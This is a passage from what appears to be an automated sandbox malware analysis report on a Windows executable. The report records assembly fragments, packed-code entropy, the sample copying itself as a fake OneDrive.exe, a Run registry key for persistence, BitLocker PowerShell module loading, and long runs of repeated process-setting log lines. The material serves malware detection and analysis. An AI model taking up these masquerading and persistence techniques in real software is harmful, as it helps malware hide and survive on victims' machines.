                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5D125 push esp; iretd 0_2_00007FFD34E5D126
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F103 push edx; iretd 0_2_00007FFD34E5F1C3
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F099 push edx; iretd 0_2_00007FFD34E5F1C3
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F214 push edx; iretd 0_2_00007FFD34E5F223
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F1F2 push edx; iretd 0_2_00007FFD34E5F1F3
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F1FA push edx; iretd 0_2_00007FFD34E5F1FB
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F1C4 push edx; iretd 0_2_00007FFD34E5F1CB
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E4A999 push eax; ret 0_2_00007FFD34E4A9B4
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5AB46 pushad ; ret 0_2_00007FFD34E5AB9D
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F324 push ecx; iretd 0_2_00007FFD34E5F32B
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F2F2 push ecx; iretd 0_2_00007FFD34E5F2F3
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F2FA push ecx; iretd 0_2_00007FFD34E5F2FB
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F2FC push ecx; iretd 0_2_00007FFD34E5F323
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F2AC push ecx; iretd 0_2_00007FFD34E5F363
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F264 push edx; iretd 0_2_00007FFD34E5F26B
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F26C push edx; iretd 0_2_00007FFD34E5F273
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F3DC push 50CBE801h; iretd 0_2_00007FFD34E5F3F3
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeCode function: 0_2_00007FFD34E5F374 push ecx; iretd 0_2_00007FFD34E5F37B
                        Source: b39wW3jYKO.exeStatic PE information: section name: .text entropy: 7.869676343007641
                        Source: OneDrive.exe.0.drStatic PE information: section name: .text entropy: 7.869676343007641

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files to the document folder of the user
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile created: C:\Users\user\Documents\OneDrive.exeJump to dropped file
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile created: C:\Users\user\Documents\OneDrive.exeJump to dropped file
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile created: C:\Users\user\AppData\Local\Temp\arndry.exeJump to dropped file
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\34EF0CD5860992665E72 5C34AEE5196E0F8615B8D1D9017DD710EA28D2B7AC99295D46046D12EEA58D78Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
